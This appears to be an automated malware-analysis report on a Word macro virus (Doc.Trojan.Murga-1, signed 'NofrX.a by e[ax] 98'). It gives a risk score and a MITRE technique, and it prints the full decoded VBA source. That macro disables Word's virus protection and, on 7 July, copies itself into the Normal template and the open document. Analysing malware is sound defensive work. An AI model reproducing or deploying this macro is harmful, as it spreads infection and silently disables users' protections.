MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample contains VBA macros that attempt to disable virus protection and save a component named 'nofrx' to 'c:\sys.sys'. This component is then imported into the Normal template, suggesting an attempt at persistence or propagation. The ClamAV detection 'Doc.Trojan.Murga-1' and the embedded artifact signature 'Win.Trojan.C-286' further indicate malicious intent.
Heuristics 2
-
ClamAV: Doc.Trojan.Murga-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Murga-1
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1137 bytes |
SHA-256: 38d2484f5fe1d2d5776509028ef7e9518ac484b9373a1a9ee79bd98799f26f06 |
|||
|
Detection
ClamAV:
Win.Trojan.C-286
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub FilePrint()
' NofrX.a by e[ax] ´98
' Special greetinz goes to -=PU=-
On Error GoTo kraj
With Options
.VirusProtection = False
.SaveNormalPrompt = False
.ConfirmConversions = False
End With
If (Month(Now) = 7) And (Day(Now) = 7) Then
MsgBox ("Danas je rodjendan Murga-drotu!!!! Ohoooooo!"), vbInformation
ActiveDocument.VBProject.VBComponents.Item("nofrx").Export ("c:\sys.sys")
NormalTemplate.VBProject.VBComponents.Import ("c:\sys.sys")
If NormalTemplate.VBProject.VBComponents.Item("nofrx").Name <> "nofrx" Then
NormalTemplate.VBProject.VBComponents.Import ("c:\sys.sys")
End If
If ActiveDocument.VBProject.VBComponents.Item("nofrx").Name <> "nofrx" Then
ActiveDocument.VBProject.VBComponents.Import ("c:\sys.sys")
End If
End If
kraj:
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.